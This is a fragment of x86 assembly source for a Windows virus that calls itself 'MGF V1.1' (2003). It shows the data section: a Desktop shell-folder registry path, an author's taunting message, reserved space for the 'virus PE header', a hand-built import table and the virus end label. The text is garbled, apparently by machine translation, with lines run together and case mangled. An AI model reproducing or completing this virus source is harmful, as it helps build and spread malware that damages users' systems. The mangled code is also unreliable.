POPADRET_EDITLNKFILE ENDPSZREGKEYDESKTOP DB 'Software / Microsoft / Windows / CurrentVersion / Explorer / Shell Folders', 0SzdesktopValue DB 'Desktop', 0
SzmessageTit DB 'Mo Guofeng's Declaration', 0SzMessageText DB 'This makers come to the dissemination technology. I have no destruction, you don't have to worry! ', 13, 10db' 我 我 比. Gates: Your fools, despise my vulnerability report, you should play their PP! ', 0
Szver DB 'Name: MGF V1.1', 0Address db '(c) nn.cn (p) 2003-10-08', 0EMAIL DB 'WOHOO2002 @ Hotmail.com', 0
FileHead DB 120H DUP (255); virus PE header, use of viruses, need to manually fill, only reserve space
ImportDirItem:; import table, it is not 2000 / XP / 2003 perform load rejection, to be dd offset FirstThunk0-400000hdd 0dd 0dd offset szKernel32-400000hdd offset FirstThunk1-400000hdd 5 dup (0) FirstThunk0: dd offset szFunctionName-400000hdd 0
Firstthunk1: DD Offset SZFUNCTIONNAME-400000HDD 0
SZFunctionName: DW 75HDB 'EXITPROCESS', 0, 0, 0
Virusend: End VirusStart